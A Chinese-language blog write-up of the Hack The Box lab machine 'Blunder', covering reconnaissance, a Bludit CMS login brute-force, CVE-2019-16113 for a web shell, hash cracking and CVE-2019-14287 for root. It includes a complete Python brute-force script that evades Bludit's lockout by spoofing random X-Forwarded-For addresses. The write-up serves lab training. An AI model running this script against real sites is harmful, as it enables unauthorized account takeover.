Hack The Box——Blunder

最新推荐文章于 2024-06-08 17:21:42 发布
最新推荐文章于 2024-06-08 17:21:42 发布
阅读量1.5w 收藏 1
点赞数
分类专栏: HackTheBox靶机 文章标签: Hack The Box HTB-Blunder 渗透测试实例 CVE-2019-16113 CVE-2019-14287
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/108173617
版权

目录

简介

信息收集

漏洞发现

暴力破解

CVE-2019-16113

漏洞利用

权限提升

凭据发现

CVE-2019-14287

总结

简介

靶机虽然不难,但是花费的时间不少。通过搜索可以发现Bludit CMS的已知漏洞,但是要利用该漏洞就需要登录到后台,因此需要枚举用户名和密码。通过todo.txt文件中的的信息猜测到用户名,然后爆破破解获得密码,接着利用CVE-2019-16113获得WebShell,然后通过枚举本地文件发现存储在php文件中的用户hugo的密码Hash值,通过解密获得用户hugo的密码。从而获得该用户的Shell,最后利用CVE-2019-14287提升至root权限。

信息收集

使用nmap快速扫描目标主机端口和服务,目标主机仅开启了80端口,运行这Apache httpd 2.4.41,操作系统为Ubuntu,内核可能为2.6.32,如图:

然后访问80端口web服务,发现是作者记录的一些文章,如图:

随手输入admin发现页面跳转到登录页面,如图:

测试发现不存在常用弱口令和SQL注入漏洞,使用Google搜索BLUDIT发现此CSM系统存在已知漏洞,如目录遍历图像文件上传(CVE-2019-16113)和暴力破解绕过。目录遍历图像上传漏洞需要拥有用户名和密码才能利用。查看网页源码发现版本号,如图:

通过Google搜索到Bludit暴力破解绕过的博客,当然也可以根据原理自行编写脚本(部分代码没进行异常处理):

#!/usr/bin/python3
import requests
import argparse
import random

#define parm
parser=argparse.ArgumentParser()
group=parser.add_mutually_exclusive_group()
parser.add_argument('-H','--host',help='target hostname or ip address',type=str)
parser.add_argument('-p','--port',help='target port,default 80',default=80,type=int)
group.add_argument('-u','--username',help='Bludit CMS username',type=str)
group.add_argument('-U','--userfile',help='Bludit CMS username list file',type=str)
parser.add_argument('-P','--password',help='password dictionary file',type=str)
args=parser.parse_args()

if args.host:
    url='http://'+args.host.strip()+'/admin/login'
    if args.password:
        if args.username:
            username=args.username.strip()
            s=requests.session()

            with open(args.password) as f:
                password=f.readline()
                password=password.strip()
                while password:
                    try:
                        r=s.get(url)
                    except KeyboardInterrupt:
                        break
                    except:
                        print('Could not connect to '+args.host+'!')

                    token=r.text
                    token=token.split('tokenCSRF')
                    token=token[2][9:49]

                    random_ip=str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))
                    head={'X-Forwarded-For':random_ip,'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'}
                    data={'tokenCSRF':token,'username':username,'password':password}
                    print('[*] Testing: Username [',username,'] and Password [',password,']')
                    r=s.post(url,headers=head,data=data,allow_redirects=False)
                    try:
                        success=r.headers['Location']
                    except:
                        success=''
                    if success == '/admin/dashboard':
                        print("\033[1;32;1m[+] Success! Username:",username,'Password:',password,"\033[0m")
                        break
                    password=f.readline()
                    password=password.strip()

        elif args.userfile:
            try:
                userfile=open(args.userfile.strip(),'r').read()
            except FileNotFoundError:
                print("Please give me a vilid file!")

            s=requests.session()
            for username in userfile.split():
                with open(args.password) as f:
                    password=f.readline()
                    password=password.strip()
                    while password:
                        try:
                            r=s.get(url)
                        except:
                            print('Could not connect to '+args.host+'!')

                        token=r.text
                        try:
                            token=token.split('tokenCSRF')
                            token=token[2][9:49]
                        except:
                            pass

                        random_ip=str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))+'.'+str(random.randint(0,255))
                        head={'X-Forwarded-For':random_ip,'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'}
                        data={'tokenCSRF':token,'username':username,'password':password}
                        print('[*] Testing: Username [',username,'] and Password [',password,']')
                        r=s.post(url,headers=head,data=data,allow_redirects=False)
                        try:
                            success=r.headers['Location']
                        except KeyboardInterrupt:
                            exit()
                        except:
                            success=''
                        if success == '/admin/dashboard':
                            print("\033[1;32;1m[+] Success! Username:",username,'Password:',password,"\033[0m")
                            exit()
                        password=f.readline()
                        password=password.strip()
        else:
            print("You must give -u or -U,and just only one!")

    else:
        print("Please give me a password file")
else:
    print("Please enter the -h parameter for detailed usage.")

将admin、bludit、blunder和首页出现的人名保存为用户字典文件,然后使用cewl -m 4 http://10.10.10.191 -w passwd.txt将首页的单词提权为密码字典文件,但是没获得登录凭据,尝试使用rockyou字典,也未破解成功。使用dirbuster扫描目录扫着扫着程序崩溃了,如图:

然后使用wfuzz继续扫描bak,txt,sql,zip等文件,发现存在todo.txt,如图:

然后查看todo.txt,发现可能为用户名的单词,如图:

漏洞发现

暴力破解

然后使用网站提取的字典passwd.txt暴力破解发现密码,如图:

使用该用户名和密码登录系统,如图:

CVE-2019-16113

使用Exploit-DB提供的漏洞利用代码测试是否存在CVE-2019-16113,如图:

在本地监听的端口获得HTTP请求,如图:

说明目标主机存在该漏洞。

漏洞利用

构造反弹shell的payload,如图:

成功获得WebShell,如图:

权限提升

查看/etc/passwd文件发现三个普通用户,如图:

进入查看/home目录未发现temp的用户目录,如图:

凭据发现

查看上级目录,在databases目录下发现php文件,在users.php文件中发现管理员用户Admin和fergus用户的Hash值和盐值,如图:

使用hash-identifier查看Hash类型,如图:

使用john和hashes.com均未破解成功,在/var/www目录下发现另一个版本的bludit,如图:

查看databases目录下的users.php文件中发现管理员用户Hugo的密码Hash值,如图:

使用john未破解成功,但使用hashes.com破解成功,如图:

尝试使用该密码登录到hugo用户的Shell,如图:

CVE-2019-14287

使用提权辅助lse.sh发现sudo命令可执行的程序,如图:

使用Google搜索发现可以利用CVE-2019-14287,如图:

成功获得root权限。

总结

该靶机用到的枚举较多,所以花费的时间较长。在扫描网站目录和文件时发现dirbuster容易崩溃,wfuzz貌似更好用些。在破解Bludit登录用户名和密码是花时间最多的,在此之后就一帆风顺了,Google都能找得到。

江左盟宗主
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-16313.MD
03-20
CVE-2019-16313.MD
Ubuntu 20.04 Apache Http Server安全漏洞解决
weixin_58269397的博客
03-24 1239
安全扫描出严重漏洞,如下图所示等大量漏洞。由于通过Ubuntu 20.04 软件源安装的Apache2最新版本是2.4.41, 这个版本目前存在诸多的高危安全漏洞,所以需要把Apache2升级到最新版本。
HackTheBox(黑客盒子)基础模块速通Responder篇
最新发布
轻舟已过万重山
06-08 1272
Responder是HackTheBox平台上的一个基础模块,用于嗅探网络中的NTLMv1/v2认证请求,并进行中间人攻击。本篇文章将介绍Responder的基本用法和一些常用技巧。
春秋云镜 CVE-2019-16113
qq_22002773的博客
08-24 824
春秋云镜 CVE-2019-16113
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 3590
一、漏洞描述 Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49 和 Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
vulnhub靶机-ODIN: 1
臭nana的博客
01-06 1498
靶机描述: 1、找到靶机ip:192.168.75.14 nmap -sn 192.168.75.14 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.14 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for odin (192.168.75.14) Host is up (0.00047s latency). Not shown: 65534 closed ports
Blunder-开源
04-15
Blunder是用于分析Java中的链式异常的自动化工具。 这对于分类,生成自定义的错误消息以及可能的解决方案列表很有用。
Blunder Chess Tools-开源
04-27
与国际象棋有关的软件工具库。 当前包括一个完整的程序包,用于分析您的游戏,搜索错误和错过的机会,然后反复检查它们,从而改善您的游戏。
blunder:ES6处理错误的组件
05-16
Blunder.js ES6处理错误的组件 import MultiError from "blunder" ; const multiError = new Blunder ( [ new Error ( "some error" ) , new Error ( "some other" ) ] ) ; //you can use an array or just one ...
blunder:现代客户端 JavaScript 错误处理程序
05-31
错误 现代客户端 JavaScript 错误处理程序 安装 下载 、 、 版本或通过 NPM 安装: npm install @ryanmorr/blunder 用法 Blunder 提供了在浏览器中增强、分派、... // Send the error to the server report ( '/pat
blunder:我犯了一个巨大的错误
06-20
欢迎使用 Blunder,这是管理 Ruby 应用程序依赖项的最糟糕方法。 通过随机卸载所需的确切 gem 和版本,Blunder 为 Ruby 项目提供了不一致的环境。 安装 将此行添加到应用程序的 Gemfile 中: gem 'blunder' , git ...
第8天-信息收集——站点搭建,WAF等
MCTSOG的博客
01-17 1515
​ 在安全测试中,信息收集是非常重要的一个环节,此环节的信息将影响到后续的成功几率,掌握信息的多少将决定发现漏洞机会大小,换言之定着是否能完成目标的测试任务。也可以很直接的跟大家说:渗透测试的思路就是从信息收集这里开始,你与大牛的差距也是从这里开始的! 站点搭建分析 搭建习惯-目录型站点 原则是一个网站,但区别在于目录下的差异 两者仅仅是目录路径不同 两个网站是两套程序,如果其中一个网站出现问题,另一个网站也会遭殃。 搭建习惯-端口类站点 在同一台服务器上,以端口来把网站进行分开,一个网站(如:88端口)
Metasploit学习之渗透测试基础
习惯积淀的博客
12-31 325
文章目录渗透测试基础PTES标准中的渗透测试阶段渗透测试类型漏洞扫描器 渗透测试基础 PTES标准中的渗透测试阶段 前期交互阶段 与客户组织进行讨论,确定渗透测试的范围和目标。这个阶段最为关键的是需要让客户了解渗透测试将涉及哪些目标。而这个阶段也为你提供了机会,来说服客户走出全范围渗透测试的理想化愿景,选择更加现实可行的渗透测试目标来进行实际实施。 情报搜集阶段 采取各种可能的方法来搜集将要攻击...
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 2806
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
HackTheBox-Machines--Builder
七天
04-01 417
Builder测试过程。
apache相关漏洞
m0_48520508的博客
09-30 4111
CVE-2019-17564-Apache Dubbo反序列化漏洞 CVE-2020-1938-Apache Tomcat文件包含漏洞 CVE-2020-1948-Apache Dubbo反序列化漏洞 CVE-2020-1956-Apache Kylin远程命令执行漏洞 CVE-2020-9480-Apache Spark远程代码执行漏洞 CVE-2020-9483-Apache SkyWalkingSQL注入漏洞
一级必杀,防不胜防的漏洞,WEB安全基础入门—文件上传漏洞
Eason_LYC安全白帽子的成长博客
06-27 2055
文件上传漏洞指缺失或可绕过对拟上传文件的名字、类型、内容或大小进行验证。导致实际可上传恶意文件,如脚本或木马。造成远程命令执行、敏感信息泄露等危害。
Hack the box靶机 Blunder
菜浪马废的博客
09-20 414
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
oklite 文件上传 (CVE-2019-16131)漏洞复现
weixin_42675091的博客
09-03 775
oklite 文件上传 (CVE-2019-16131)漏洞复现
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
weixin_64655821的博客
10-13 1991
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值